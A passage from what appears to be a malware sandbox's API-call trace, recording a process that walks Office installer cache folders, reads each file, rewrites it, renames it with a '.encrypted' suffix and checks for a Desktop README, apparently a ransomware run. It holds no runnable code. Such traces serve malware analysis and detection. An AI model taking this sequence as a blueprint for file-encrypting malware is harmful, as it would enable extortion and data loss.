Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0227.150] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0227.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0227.150] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0x6cef8640, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x760)) returned 1 [0227.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0227.150] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.encrypted")) returned 1 [0227.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0227.151] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0227.151] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0227.151] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f0e30 [0227.153] FindNextFileW (in: hFindFile=0x94f0e30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.153] FindNextFileW (in: hFindFile=0x94f0e30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0227.153] FindNextFileW (in: hFindFile=0x94f0e30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee3b15e0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x264400, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveMUI.msi", cAlternateFileName="GROOVE~1.MSI")) returned 1 [0227.153] FindNextFileW (in: hFindFile=0x94f0e30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveMUI.xml", cAlternateFileName="GROOVE~1.XML")) returned 1 [0227.154] FindNextFileW (in: hFindFile=0x94f0e30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0227.154] FindNextFileW (in: hFindFile=0x94f0e30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.154] FindClose (in: hFindFile=0x94f0e30 | out: hFindFile=0x94f0e30) returned 1 [0227.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0227.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0227.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0227.155] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0227.155] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0227.155] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f0e30 [0227.156] FindNextFileW (in: hFindFile=0x94f0e30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.156] FindNextFileW (in: hFindFile=0x94f0e30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0227.156] FindNextFileW (in: hFindFile=0x94f0e30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee3b15e0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x264400, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveMUI.msi", cAlternateFileName="GROOVE~1.MSI")) returned 1 [0227.156] FindNextFileW (in: hFindFile=0x94f0e30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveMUI.xml", cAlternateFileName="GROOVE~1.XML")) returned 1 [0227.156] FindNextFileW (in: hFindFile=0x94f0e30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0227.157] FindNextFileW (in: hFindFile=0x94f0e30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0227.157] FindClose (in: hFindFile=0x94f0e30 | out: hFindFile=0x94f0e30) returned 1 [0227.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0227.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0227.158] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", lpFilePart=0x0) returned 0x4b [0227.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0227.158] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0227.160] GetFileType (hFile=0x280) returned 0x1 [0227.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0227.160] GetFileType (hFile=0x280) returned 0x1 [0227.160] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x3e7e1f [0227.172] ReadFile (in: hFile=0x280, lpBuffer=0x3a3ae90, nNumberOfBytesToRead=0x3e7e1f, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x3a3ae90*, lpNumberOfBytesRead=0x2ee7d4*=0x3e7e1f, lpOverlapped=0x0) returned 1 [0227.277] CloseHandle (hObject=0x280) returned 1 [0229.095] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0229.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0229.095] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0229.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0229.095] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", lpFilePart=0x0) returned 0x4b [0229.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0229.095] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0229.096] GetFileType (hFile=0x280) returned 0x1 [0229.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0229.096] GetFileType (hFile=0x280) returned 0x1 [0229.096] WriteFile (in: hFile=0x280, lpBuffer=0x51f0c58*, nNumberOfBytesToWrite=0x3e7e20, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0x51f0c58*, lpNumberOfBytesWritten=0x2ee7c4*=0x3e7e20, lpOverlapped=0x0) returned 1 [0229.182] CloseHandle (hObject=0x280) returned 1 [0229.183] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", lpFilePart=0x0) returned 0x4b [0229.183] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.encrypted", lpFilePart=0x0) returned 0x55 [0229.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0229.183] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x6e24f900, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e20)) returned 1 [0229.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0229.183] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.encrypted")) returned 1 [0229.184] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0229.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0229.184] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0229.184] GetFileType (hFile=0x280) returned 0x1 [0229.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0229.185] GetFileType (hFile=0x280) returned 0x1 [0229.185] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x391 [0229.185] ReadFile (in: hFile=0x280, lpBuffer=0x224b1c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x224b1c0*, lpNumberOfBytesRead=0x2ee7d4*=0x391, lpOverlapped=0x0) returned 1 [0229.186] CloseHandle (hObject=0x280) returned 1 [0229.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0229.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0229.235] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0229.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0229.235] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0229.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0229.235] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0229.236] GetFileType (hFile=0x280) returned 0x1 [0229.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0229.236] GetFileType (hFile=0x280) returned 0x1 [0229.236] WriteFile (in: hFile=0x280, lpBuffer=0x229af58*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x229af58*, lpNumberOfBytesWritten=0x2ee798*=0x3a0, lpOverlapped=0x0) returned 1 [0229.237] CloseHandle (hObject=0x280) returned 1 [0229.237] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpFilePart=0x0) returned 0x4c [0229.237] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.encrypted", lpFilePart=0x0) returned 0x56 [0229.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0229.237] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x6e2e7e80, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x3a0)) returned 1 [0229.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0229.238] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.encrypted")) returned 1 [0229.239] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0229.239] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0229.239] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0229.239] GetFileType (hFile=0x280) returned 0x1 [0229.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0229.239] GetFileType (hFile=0x280) returned 0x1 [0229.239] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x5ac [0229.239] ReadFile (in: hFile=0x280, lpBuffer=0x229c870, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x229c870*, lpNumberOfBytesRead=0x2ee7d4*=0x5ac, lpOverlapped=0x0) returned 1 [0229.241] CloseHandle (hObject=0x280) returned 1 [0229.256] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0229.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0229.256] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0229.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0229.256] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0229.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0229.256] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 